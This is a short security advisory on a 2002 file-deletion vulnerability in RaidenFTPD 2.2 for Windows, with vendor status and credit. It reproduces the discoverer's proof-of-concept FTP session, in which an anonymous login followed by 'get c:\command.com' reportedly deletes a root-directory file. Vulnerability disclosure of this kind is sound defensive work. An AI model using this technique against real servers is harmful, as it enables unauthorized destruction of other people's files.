File Deletion Vulnerability in RaidenFTPD for Windows

Reported January 14, 2002, by Tamer Sahin.

VERSIONS AFFECTED

  • RaidenFTPD 2.2 for Windows 2000, Windows NT, and Windows 9x

 

DESCRIPTION
A vulnerability exists in Raiden FTPD 2.2 that lets an attacker delete any file on the system located in the root directory (c:\, d:\, etc.).

 

DEMONSTRATION

The discoverer posted the following demonstration as proof-of-concept:

 

C:\>ftp 192.168.10.3

Connected to 192.168.10.3.

220-This FTP site is running free version of RaidenFTPD

220-Download chinese version from

http://playstation2.idv.tw/raiden-ftpd-site/

220-Download english version from

http://playstation2.idv.tw/raidenftpd/

220-RaidenFTPD32 for RaidenFTPD (up since 2002/01/13 17:07)

220-This server is for private use only

220-If you do not have access to this server

220-Please disconnect now

220 Please enter your login name now.

User (192.168.10.3:(none)): anonymous

331 Password required for anonymous .

Password:

230-------------------------------------------------------------------

- ----+

230-   lvl=level r=root s=superusers n=normal g=guest * = all

userlevels

230-   grp=group n=nukers s=sitebot

230-for more detailed descriptions, please visit raidenftpd homepage

230-http://playstation2.idv.tw/raidenftpd/raiden-ftpd-doc/help-sitecmd

.html

230-------------------------------------------------------------------

- ----+

230 User anonymous logged in, proceed.

ftp> get c:\command.com

Error opening local file command.com.

> command.com:Permission denied

ftp> quit

221-

221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

- -=-=-=-=-

221-                  anonymous , ºAñ¦ñ-ñW¦¦ "0" BYTES, ñU+n "0"

BYTES

221-                  +QºA¦ßí@~~~~S·ñ¯~~~~

221-                  ªA¿úíA+w¬nªAª+Ñ·-\{!!!!

221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

- -=-=-=-=-

221-<This system is running unregistered version of RaidenFTPD>.

221 Goodbye.

 

And file has been deleted!

 

 

VENDOR RESPONSE

The vendor, RaidenFTPD, has been notified but hasn't issued a patch.

 

CREDIT
Discovered by Tamer Sahin of Security Office.

TAGS: Security
Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish